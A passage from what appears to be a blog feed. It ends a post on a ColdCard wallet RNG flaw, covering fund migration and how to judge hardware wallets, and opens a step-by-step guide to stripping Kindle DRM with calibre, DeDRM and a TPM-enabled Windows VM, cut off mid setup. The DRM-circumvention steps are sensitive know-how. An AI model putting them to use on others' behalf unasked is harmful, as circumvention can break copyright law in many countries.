<li><strong>Choose the new architecture.</strong> I would not generate the new seed on a ColdCard. Use another new signer bought directly from the manufacturer, a SeedSigner, or 2-of-3 with different implementations. Do not import the old words into it. If you insist on reusing your ColdCard, first install the corrected firmware for the proper model and release track.</li>
<li><strong>Generate new entropy.</strong> Use independent sources and an audited mixer. For dice, use casino-grade material, multiple sources, and at least 99 rolls for a 24-word mnemonic. I would do more.</li>
<li><strong>Back up before receiving.</strong> Mnemonic, separate passphrase, fingerprints, and the descriptor for multisig. Never photograph any of them or store them in the cloud.</li>
<li><strong>Test recovery.</strong> Recreate the wallet and verify fingerprints and addresses. In multisig, prove that two keys can sign without depending on the third.</li>
<li><strong>Verify the address on the screen.</strong> Do not trust only what Sparrow displays on the computer monitor.</li>
<li><strong>Send a small amount.</strong> Confirm that the new wallet can receive and spend. Coinkite also recommends this test.</li>
<li><strong>Move the rest immediately afterward.</strong> Review the fee and every output. Look for balances in other accounts, passphrases, and change addresses derived from the old seed.</li>
<li><strong>Keep the old backup marked as compromised.</strong> Retain it until you are certain the migration confirmed and no delayed deposit will arrive. Never reuse an old address.</li>
</ol>
<blockquote>
  <p>If the attacker is racing you, do not spend a week designing the perfect multisig. Create a safe, verified destination, perform the minimum test, and move the funds beyond the old key&rsquo;s reach. You can reorganize UTXOs and improve the architecture later, with time to think.</p>

</blockquote>
<h2>So which hardware wallet do I recommend?<span class="hx:absolute hx:-mt-20" id="so-which-hardware-wallet-do-i-recommend"></span>
    <a href="#so-which-hardware-wallet-do-i-recommend" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Today, none.</p>
<p>After explaining entropy generation, BIP39, passphrases, PSBT, air gaps, descriptors, and multisig, it should be clear that fully offline, hand-built self-custody is <strong>very hard</strong>. I do not expect a normal person to master the mathematical implications, audit every algorithm, and execute every step without error. Most programmers could not do it either. I will not pretend I can review the entire chain alone, from silicon to the firmware running on the device.</p>
<p>That is exactly why hardware wallets exist. They package complicated cryptography and procedures into an interface a person can operate. This transfers part of the responsibility to the manufacturer; it does not make trust disappear.</p>
<p>Leaving your life savings in an exchange account remains the worst default. You do not have the keys and depend on the company&rsquo;s solvency, withdrawal policy, legal system, and account security. But a handmade setup you do not understand can also end in total loss. There is no point eliminating counterparty risk only to replace it with a ceremony nobody can restore after a fire or your own death.</p>
<p>For years, the hardware wallet was treated as the last safe haven between those extremes. Coinkite shook trust in the entire category. That does not mean Ledger, Trezor, BitBox, Passport, Jade, SeedSigner, and everyone else are broken or equivalent. It means a strong name, secure element, air gap, visible code, and years on the market are not enough. I can no longer point to one device and say, &ldquo;buy this and sleep well.&rdquo; You will have to do your homework.</p>
<blockquote>
  <p><strong>NEVER buy a second-hand hardware wallet. Buy it new, directly from the manufacturer&rsquo;s official store.</strong> Do not save on shipping by placing your life savings in a device that passed through a stranger&rsquo;s hands. Marketplace listings, auctions, eBay, &ldquo;open box,&rdquo; refurbished hardware, and that unbelievable deal from a friend are all out of the question.</p>

</blockquote>
<p>When the package arrives, do not tear everything open and start pressing buttons. Open the official documentation for that model and follow its supply-chain verification. <a href="https://coldcard.com/docs/quick/"target="_blank" rel="noopener">ColdCard uses serialized packaging that shows evidence of opening</a>: the number appears on the bag, an internal tab, and the device itself. <a href="https://trezor.io/support/troubleshooting/device-issues/is-my-device-safe-to-use"target="_blank" rel="noopener">Trezor documents the holographic seals</a> for each model. <a href="https://support.bitbox.swiss/en_US/orders-shipping/verifying-the-bitbox02-packaging"target="_blank" rel="noopener">BitBox combines sealed packaging with cryptographic attestation</a> performed by its app.</p>
<p>Check the seal, cuts, glue, serial number, box contents, and the authenticity mechanism shown by the device or official software. Any mismatch ends the setup: do not connect a seed, do not &ldquo;see whether it works,&rdquo; and contact the manufacturer. The device must arrive without an initialized wallet and generate new words in front of you. A seed printed inside the box is a scam.</p>
<p>And watch the terminology: all of this is <strong>tamper-evident</strong>, not tamper-proof. ColdCard&rsquo;s own documentation admits a bag can be attacked; BitBox says perfect packaging does not guarantee authenticity. An intact seal is one layer. I still want attestation or a genuine check, signed firmware, hash verification where available, and a complete test with a small amount of money.</p>
<p>I would start with these questions:</p>
<ol>
<li><strong>What is the published threat model?</strong> The manufacturer must say what it protects against and, more importantly, what remains out of scope: an infected computer, stolen device, physical laboratory attack, supply chain, targeted firmware, coercion. &ldquo;Military-grade security&rdquo; is not a threat model.</li>
<li><strong>Where does the entropy come from, exactly?</strong> Find the sources, how they are combined, and which end-to-end tests prove the <code>New Wallet</code> flow reaches the promised RNG. Support for dice or external entropy helps only when the mixing mechanism is documented and audited. The ColdCard case showed that having the correct TRNG inside the binary does not mean seed generation uses it.</li>
<li><strong>Is the code actually free, and does the binary correspond to it?</strong> &ldquo;Source available&rdquo; under a restrictive license is not FOSS. Open code permits audits, but does not prove anyone performed one. A <a href="https://reproducible-builds.org/docs/definition/"target="_blank" rel="noopener">reproducible build</a> lets third parties rebuild the firmware and compare it bit for bit. Look for current independent verifications on <a href="https://walletscrutiny.com/"target="_blank" rel="noopener">WalletScrutiny</a>, not just the manufacturer&rsquo;s promise.</li>
<li><strong>How does the company treat people who find flaws?</strong> Read the disclosure policy, scope, and bounty amounts. Look for old advisories, CVEs, postmortems, and conversations with researchers. A company that publishes a vulnerability, explains its cause, fixes it quickly, and thanks the researcher deserves more trust than one with a supposedly &ldquo;perfect&rdquo; history. Sometimes nobody found a vulnerability because nobody competent had an incentive to look.</li>
<li><strong>What can you verify on the trusted screen?</strong> Before signing, the device should display the address, amount, fee, and change. It should verify receiving addresses on its own display, allow PIN and passphrase entry without handing them to the computer, and correctly register the multisig policy. A secure element protects a key; it cannot rescue an interface that makes you sign without understanding the outputs.</li>
<li><strong>Is there an exit route without the manufacturer?</strong> I want interoperable standards: BIP39/BIP32 where applicable, <a href="https://bips.dev/174/"target="_blank" rel="noopener">PSBT</a>, and <a href="https://bips.dev/380/"target="_blank" rel="noopener">output descriptors</a>. I want to export xpubs, fingerprints, and descriptors, use Sparrow, connect my node, and recover through another implementation. Mandatory accounts, proprietary clouds, and backups that open only in the company&rsquo;s app are lock-in built on top of the key to your life.</li>
<li><strong>How do the hardware, firmware, and supply chain work?</strong> A secure element, ordinary microcontroller, and stateless signer make different tradeoffs. Find out what persists on the device and what a physical attacker can extract. Releases should be signed, have useful changelogs, prevent unsafe downgrades, and receive maintenance for years. Research how the device proves authenticity, how the company documents packaging and transport, what happens if the update server disappears, and which closed components exist. An air gap is not a magic seal either: QR, NFC, and microSD are input parsers and remain an attack surface.</li>
<li><strong>Can you recover without improvising?</strong> Before depositing meaningful value, generate the wallet, back it up, erase the device, and recover. Verify the fingerprint, an address, and a complete round-trip transaction. In multisig, restore the descriptor and prove the quorum works without one key. An untested backup is hope, not a backup.</li>
</ol>
<p>I would also research the repository history, security issues, recent commits, independent audits, and the time between a vulnerability report and its fix. I would search for the model name alongside <code>vulnerability</code>, <code>reproducible build</code>, <code>seed entropy</code>, <code>multisig</code>, and <code>responsible disclosure</code>. An influencer review with an affiliate link is useful for seeing the screen and device size, not for deciding where to store your wealth.</p>
<p>For small amounts, a thoroughly researched commercial signer may be much less risky than a handmade invention. For wealth that changes your life, 2-of-3 with different manufacturers and codebases remains the reference, as <a href="https://sparrowwallet.com/docs/best-practices.html"target="_blank" rel="noopener">Sparrow&rsquo;s guide</a> recommends. It limits the damage from one compromised vendor, but demands more backups, more testing, and a well-documented policy. Multisig you cannot restore is worse than well-maintained single-sig.</p>
<p>In some collaborative custody services, a company holds one key in a 2-of-3 setup. It should not be able to spend alone, but it learns information about your wallet and can disappear, deny service, or complicate recovery. A professional custodian also exchanges technical risk for legal and counterparty risk. In the end, you choose which risk you carry and which you hand to someone else.</p>
<p>The best recommendation I can offer is not a brand. Choose an architecture proportional to the amount and determine which failures it tolerates. Before depositing money that would hurt to lose, run the entire flow with a small amount: receive, spend, erase one signer, restore the backup, and see whether you can return on your own.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Self-custody removes the custodian but leaves a brutal responsibility behind. Trust remains spread across silicon, firmware, the compiler, the build process, the wallet coordinator, and your own discipline. Hardware wallets remain useful because doing everything by hand is impractical for almost everyone. The mistake is confusing the tool with a guarantee.</p>
<p>I do not recommend a specific brand today. I prefer to distribute risk and create ways to catch failures: independent entropy sources, free code, reproducible builds verified by third parties, rehearsed recoveries, different signers, and multisig when the amount justifies it and you accept the bureaucracy. Single-sig with a passphrase is an understandable choice. It simply does not provide the same fault tolerance. Make that choice knowing what you delegate and which risk you decided to keep.</p>
<p>This may become <strong>one of the worst episodes in the history of Bitcoin self-custody</strong>. Not because someone left coins on a shitty exchange, typed a seed into a phishing site, or installed a pirated wallet. Many people bought a dedicated device, wrote down 24 words, kept the backup in steel, kept everything offline, and signed through an air gap. They did exactly what Bitcoin culture taught as the correct procedure. A nasty bug still caught them at the most important moment of all: choosing the root.</p>
<blockquote>
  <p>In the worst cases, the RNG reduced the universe to something around <code>2^40</code>. The attacker does not need to touch the ColdCard. They enumerate possible states, derive the most likely BIP32 trees and addresses, query the public blockchain, and find which candidates hold UTXOs. Once they find one, they also have the private keys needed to sign. The ColdCard may be powered off, without a battery or USB cable, and locked in a safe. It makes no difference. An air gap protects the path between signer and computer; it cannot recover entropy that never existed.</p>

</blockquote>
<p>There was no visible warning. The wallet received, signed, and restored normally until the day someone else reproduced the same key. That is why 12 versus 24 words, air gap versus USB, and secure element versus microcontroller become secondary debates when nobody tested whether the <strong>New Wallet</strong> button called the correct RNG.</p>
<p>It also shows why I refuse to call negligence a black swan. The source was open, the path was auditable, and the culture pushed away some of the people most capable of spotting problems. It was a white swan waiting for someone to look in the right direction.</p>
<blockquote>
  <p>The lesson is not to abandon self-custody. It is to stop outsourcing understanding. Study the threat model, find out how entropy is generated, inspect the manufacturer&rsquo;s history, rehearse recovery, and know which risks remain concentrated. Do not blindly trust a company, certification, influencer, tutorial, or article. Not even this one. Verify.</p>

</blockquote>
<p>I have already moved my funds from the old ColdCard. In practice, if you own any ColdCard, do the same. There is no prize for finding out too late that your case had another undocumented exception.</p>
<p>Choose the new architecture using the criteria above. Generate a completely new root. Mix genuinely independent entropy. Test the backup. Verify the addresses. Move everything.</p>
]]></content:encoded><category>bitcoin-and-cryptocurrency</category><category>security</category><category>hardware</category></item><item><title>Removing DRM from Kindle Ebooks in 2026</title><link>https://www.akitaonrails.com/en/2026/07/30/removing-drm-from-kindle-ebooks-in-2026/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/07/30/removing-drm-from-kindle-ebooks-in-2026/</guid><pubDate>Thu, 30 Jul 2026 18:00:00 GMT</pubDate><description>&lt;p&gt;I&amp;rsquo;ve been an Amazon customer for far too long. I&amp;rsquo;ve bought Kindle books for years, owned several of their devices, and I still hate the way the company treats digital content.&lt;/p&gt;
&lt;p&gt;You pay for a book, but you can only read it where Amazon allows. There is no decent native Linux app. Moving to another reader turns into an exercise in archaeology. I bought a new Xteink X4 and, naturally, my library couldn&amp;rsquo;t simply come along. The file was &amp;ldquo;in my account,&amp;rdquo; but it wasn&amp;rsquo;t under my control.&lt;/p&gt;</description><content:encoded><![CDATA[<p>I&rsquo;ve been an Amazon customer for far too long. I&rsquo;ve bought Kindle books for years, owned several of their devices, and I still hate the way the company treats digital content.</p>
<p>You pay for a book, but you can only read it where Amazon allows. There is no decent native Linux app. Moving to another reader turns into an exercise in archaeology. I bought a new Xteink X4 and, naturally, my library couldn&rsquo;t simply come along. The file was &ldquo;in my account,&rdquo; but it wasn&rsquo;t under my control.</p>
<p>For years, I worked around this through the official route. I&rsquo;d sign into Amazon&rsquo;s website, use <strong>Download &amp; Transfer via USB</strong>, download the <code>.azw</code> files for books I&rsquo;d bought, and import everything into <a href="https://calibre-ebook.com/about"target="_blank" rel="noopener">calibre</a>. With the DeDRM plugin configured for my Kindle&rsquo;s serial number, I&rsquo;d convert them to EPUB and be done with it.</p>
<p>On <strong>February 26, 2025</strong>, Amazon <a href="https://www.vice.com/en/article/amazon-is-killing-your-ability-to-download-kindle-books-next-week/"target="_blank" rel="noopener">shut that option down</a>. No decent announcement, no replacement that actually handed over the file, and no concern for anyone who wanted a local backup. My newer books have been trapped in their ecosystem ever since. I tried again last year, updated the plugin, copied files from my Kindle Paperwhite, entered the correct serial number, and got nowhere.</p>
<p>To be fair, on <strong>January 20, 2026</strong>, Amazon began allowing verified buyers to download EPUB or PDF files when the publisher <a href="https://kdp.amazon.com/pt_BR/help/topic/GDDXGH9VR22ACM8U"target="_blank" rel="noopener">marks the book as DRM-free</a>. Great. That doesn&rsquo;t help with protected books, and the decision still belongs to the publisher. Older DRM-free titles must also be confirmed one by one by the publisher. This did not magically add a download button to my library.</p>
<p>I decided to try again now. The new DeDRM version can handle the current DRM, but the process has changed quite a bit. It takes work, requires Windows for one step, and relies on a community tool still in pre-release. It worked. I recovered <strong>106 books I&rsquo;d bought</strong>, tested the EPUB conversion, and can now read them on whatever device I choose.</p>
<p>This is the state of play on <strong>July 30, 2026</strong> (updated August 19). Amazon could change the encryption or the app tomorrow. Ignore old tutorials telling you to install Kindle for PC 1.17, disable updates, and enter the device serial number in Calibre. That world is gone.</p>
<p>And let&rsquo;s get the obvious out of the way: I&rsquo;m talking about books <strong>I bought</strong>. I&rsquo;m not talking about downloading Kindle Unlimited titles, library loans, or somebody else&rsquo;s books. Laws covering DRM circumvention vary by country. Check the law where you live and take responsibility for what you do.</p>
<h2>First things first: don&rsquo;t throw out an old Kindle<span class="hx:absolute hx:-mt-20" id="first-things-first-dont-throw-out-an-old-kindle"></span>
    <a href="#first-things-first-dont-throw-out-an-old-kindle" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Amazon doesn&rsquo;t make it easy to repurpose an old Kindle either. The hardware remains perfectly good, the battery is usually replaceable, and an e-ink screen lasts forever, yet the software becomes increasingly closed and limited.</p>
<p>If you want to revive one of these devices, I recommend the <a href="https://www.youtube.com/@DammitJeff"target="_blank" rel="noopener">Dammit Jeff</a> channel. He covers jailbreaks, KOReader, alternative stores, and ways to keep Kindles useful after Amazon loses interest. His video about <a href="https://www.youtube.com/watch?v=l4ZliC82RtA"target="_blank" rel="noopener">AdBreak and recent jailbreaks</a> is a good place to start. Read the <a href="https://kindlemodding.org/"target="_blank" rel="noopener">current Kindle Modding guide</a> before doing anything, because supported firmware and methods change constantly.</p>
<p>Jailbreaking the device and removing DRM from an ebook are separate problems. You do not need to unlock your Kindle to follow the rest of this article. I mention both because they start from the same premise: hardware and media we&rsquo;ve already paid for should remain useful without asking the manufacturer for eternal permission.</p>
<h2>Crash course: AZW, EPUB, and KFX<span class="hx:absolute hx:-mt-20" id="crash-course-azw-epub-and-kfx"></span>
    <a href="#crash-course-azw-epub-and-kfx" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>DRM and file format are separate things. The format defines how text, images, fonts, the table of contents, and metadata are packaged. DRM adds a cryptographic lock on top and decides which account, app, or device can open it.</p>
<p>These are the three names that matter here:</p>
<table>
  <thead>
      <tr>
          <th>Format</th>
          <th>What it is</th>
          <th>In practice</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><strong>AZW / AZW3</strong></td>
          <td>An older family of proprietary Kindle formats. AZW3 is also known as Kindle Format 8.</td>
          <td>This is what normally came through the old USB download. Tools and alternative readers understand it well after the DRM is removed.</td>
      </tr>
      <tr>
          <td><strong>EPUB</strong></td>
          <td>An open W3C standard. It is a single package containing HTML-based content, CSS, SVG, fonts, and metadata.</td>
          <td>It is the most portable format for storage and reading outside Amazon&rsquo;s ecosystem. This is the destination I want.</td>
      </tr>
      <tr>
          <td><strong>KFX</strong></td>
          <td>Amazon&rsquo;s modern delivery format, used for features such as Enhanced Typesetting and Page Flip. A purchased book may be split across several containers, auxiliary resources, and a DRM voucher.</td>
          <td>This is what the current Kindle app downloads. We need to gather the pieces, remove the DRM, and only then convert it.</td>
      </tr>
  </tbody>
</table>
<p>The extension alone can be misleading. Pieces of a KFX book may show up as <code>.azw</code>, <code>.azw.res</code>, <code>.voucher</code>, and other variations. The <a href="https://www.mobileread.com/forums/showthread.php?t=291290"target="_blank" rel="noopener">KFX Input</a> plugin exists specifically to understand that bundle.</p>
<p>EPUB is much less mysterious. The <a href="https://www.w3.org/TR/epub-33/"target="_blank" rel="noopener">EPUB 3.3 specification</a> defines it as a single-file container for structured Web content. It&rsquo;s basically a small packaged website. Any halfway decent reader can support it without depending on a secret Amazon key.</p>
<h2>Calibre and the two plugins<span class="hx:absolute hx:-mt-20" id="calibre-and-the-two-plugins"></span>
    <a href="#calibre-and-the-two-plugins" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p><a href="https://calibre-ebook.com/"target="_blank" rel="noopener">calibre</a> is the Swiss Army knife of ebooks. It&rsquo;s open source, runs on Linux, macOS, and Windows, organizes libraries, fetches metadata, edits covers, transfers books, and converts dozens of formats. It has been around since 2006 and was born precisely because the first Sony Reader didn&rsquo;t work properly on Linux.</p>
<p>On Omarchy or any other Arch system, install the package:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo pacman -S calibre</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>For other distributions, see the <a href="https://calibre-ebook.com/download"target="_blank" rel="noopener">official download page</a>. Don&rsquo;t install some random package from a download site.</p>
<p>One gotcha for environments using <code>mise</code>: if Calibre dies with <code>ModuleNotFoundError: msgpack</code> or <code>BrokenPipeError</code>, a Python shim probably got ahead of <code>/usr/bin</code>. The Arch package needs the system Python. Start it like this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">env <span class="nv">PATH</span><span class="o">=</span><span class="s2">&#34;/usr/bin:</span><span class="nv">$PATH</span><span class="s2">&#34;</span> /usr/bin/python3 /usr/bin/calibre</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>This has nothing to do with DRM or the plugins. It&rsquo;s just Calibre&rsquo;s helper calling the wrong Python. I left a permanent launcher with this <code>PATH</code> on my desktop.</p>
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/2026/07/30/kindle-dedrm/calibre-library-epub.webp" alt="My Calibre library with a converted book available in both AZW3 and EPUB."  loading="lazy" /></p>
<p>Calibre alone does not remove DRM. We need two plugins:</p>
<ol>
<li><strong>DeDRM</strong> recognizes and removes locks from several ecosystems during import. It only runs when the book enters the library. Clicking Convert afterward removes nothing.</li>
<li><strong>KFX Input</strong> understands Amazon&rsquo;s modern containers, gathers the pieces of a book, and makes EPUB conversion possible.</li>
</ol>
<p>At the time of writing, I&rsquo;m using <strong>DeDRM 10.0.28</strong>, published on July 14 in the <a href="https://github.com/Satsuoni/DeDRM_tools/releases/tag/v10.0.28"target="_blank" rel="noopener">fork maintained by Satsuoni</a>. It is a pre-release. Download the asset named <code>DeDRM_tools.zip</code>, never a standalone executable from some obscure mirror.</p>
<p><strong>Update (August 2026):</strong> the Kindle app on the Microsoft Store keeps moving, and each new app version requires a new version of the tool. Since this article was published, the app moved past 1.0.18632: <a href="https://github.com/Satsuoni/DeDRM_tools/releases/tag/v10.0.29"target="_blank" rel="noopener">10.0.29</a> added support for app 1.22326, and <a href="https://github.com/Satsuoni/DeDRM_tools/releases/tag/v10.0.30"target="_blank" rel="noopener">10.0.30</a> supports app 1.0.22920. The practical rule is a single one: the executable&rsquo;s name carries the app version it understands (<code>MSIXKFXArchiverMobi1_22920.exe</code> for Store app 1.0.22920, and so on). Before you start, always check the <a href="https://github.com/Satsuoni/DeDRM_tools/releases"target="_blank" rel="noopener">releases page of Satsuoni&rsquo;s fork</a> and grab the <strong>newest</strong> pre-release. Everything else in the process described here stays the same.</p>
<p>I extracted everything into a directory that would later be shared with the Windows VM:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mkdir -p ~/Windows/Kindle-DeDRM/v10.0.28
</span></span><span class="line"><span class="cl">unzip ~/Downloads/DeDRM_tools.zip -d ~/Windows/Kindle-DeDRM/v10.0.28</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The SHA-256 for the <code>DeDRM_tools.zip</code> I used was:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">520cce704edf9ae26e43196efe2871daf9b25d6cb489aa56051626801c362947</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Check it with <code>sha256sum</code>. This doesn&rsquo;t magically turn a community binary into safe software, but it at least confirms that you&rsquo;re using the same file I tested.</p>
<p>Inside that directory is <code>DeDRM_plugin.zip</code>. <strong>Do not extract this second ZIP.</strong> In Calibre, open <strong>Preferences → Plugins → Load plugin from file</strong>, choose <code>DeDRM_plugin.zip</code>, accept the warning, and restart the program.</p>
<p>Then go back to <strong>Preferences → Plugins → Get new plugins</strong>, search for <strong>KFX Input</strong>, and install it. My test used version <strong>2.33.0</strong>. Restart again.</p>
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/2026/07/30/kindle-dedrm/calibre-plugins-dedrm-kfx.webp" alt="Calibre 9.11 with DeDRM 10.0.28 and KFX Input 2.33.0 installed."  loading="lazy" /></p>
<h2>Why copying from the Kindle over USB didn&rsquo;t work<span class="hx:absolute hx:-mt-20" id="why-copying-from-the-kindle-over-usb-didnt-work"></span>
    <a href="#why-copying-from-the-kindle-over-usb-didnt-work" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The simplest path would still be plugging in my new Kindle Paperwhite, copying the book, and configuring the device serial number in DeDRM. That was the first thing I tried.</p>
<p>The file came in as <code>KFX-ZIP</code>, the plugin ran, but it remained encrypted. I opened Calibre in debug mode and the log showed that the book used the <code>ACCOUNT_SECRET</code> strategy. The serial number was correct. The required key no longer came from the device alone.</p>
<p>That&rsquo;s why so many people follow an old tutorial, try five different serial numbers, and conclude that DeDRM is broken. New books with this DRM need the secret stored by the current Kindle app on Windows. That secret is protected by TPM APIs.</p>
<h2>A disposable Windows inside Omarchy<span class="hx:absolute hx:-mt-20" id="a-disposable-windows-inside-omarchy"></span>
    <a href="#a-disposable-windows-inside-omarchy" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I&rsquo;m not keeping a dual-boot setup just to download ebooks. I&rsquo;m also not going to pretend Wine runs everything. Fortunately, Omarchy <a href="https://learn.omacom.io/books/2/pages/100"target="_blank" rel="noopener">already ships with everything needed to install and launch a Windows VM</a>: it appears in the Omarchy menu, opens over RDP, and automatically shares <code>~/Windows</code> with the guest. I didn&rsquo;t have to build this integration from scratch.</p>
<p>Underneath, it uses <a href="https://github.com/dockur/windows"target="_blank" rel="noopener">dockur/windows</a>. Dockur packages QEMU/KVM inside a container and automates the Windows installation. It remains a real virtual machine with its own disk and kernel. The container handles distribution, configuration, and lifecycle.</p>
<p>To install it from the terminal, run:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">omarchy-windows-vm install</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Choose the RAM, CPU count, and disk size. The installer creates <code>~/.config/windows/docker-compose.yml</code>, stores the virtual disk in <code>~/.windows</code>, and shares <code>~/Windows</code> with the guest. Inside Windows, that directory appears as <strong>Shared</strong>, usually on <code>Z:</code>, and is also available at <code>\\host.lan\Data</code>.</p>
<p>The detail that mattered in my case was enabling <strong>TPM 2.0</strong>. Edit the generated Compose file and add <code>TPM: &quot;Y&quot;</code> to the <code>environment</code> block:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">services</span><span class="p">:</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">  </span><span class="nt">windows</span><span class="p">:</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="nt">image</span><span class="p">:</span><span class="w"> </span><span class="l">dockurr/windows</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="nt">environment</span><span class="p">:</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">      </span><span class="nt">VERSION</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;11&#34;</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">      </span><span class="nt">TPM</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;Y&#34;</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
